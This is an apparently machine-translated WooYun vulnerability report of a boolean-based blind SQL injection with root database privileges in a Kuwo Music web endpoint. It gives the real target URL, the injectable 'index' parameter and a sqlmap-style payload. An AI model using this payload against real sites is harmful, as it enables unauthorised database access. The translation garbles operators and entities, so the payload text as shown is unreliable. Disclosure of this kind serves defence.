漏洞标题 酷我的音乐应用程序某处ROOT权限注入2 相关制造商 kuwo音乐 漏洞作者 过路人 提交时间 2016-04-25 16: 59 公共时间 2016-06-10 11: 00 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 15 漏洞状态 制造商已确认 标签标签 注入,Mysql 漏洞详细信息 有一个注入的URL *****%E7%82%B9&安培;时间=1460765040&安培;页=***** 注射点:指数 手动注射实验
注射型,类型 基于布尔的盲人 参数:索引(GET) 输入:基于布尔值的盲 标题:和基于布尔的盲 - WHERE,H * ING,ORDER BY或GROUP BY子句 有效载荷:http://rewu.kuwo.cn/album/message/commmessage?topcolumn=%E8%A7%82%E7%82%B9&time=1460765040&page=1&index=101913和3478=3478& randnum=0.1987865 后端DBMS: MySQL 5.0.12 --- ROOT权限注入,当前用户 [电子邮件 保护]/*% 目前-DB 编辑 漏洞证明: 修理计划: 参数过滤 版权声明:请注明出处。居民A @乌云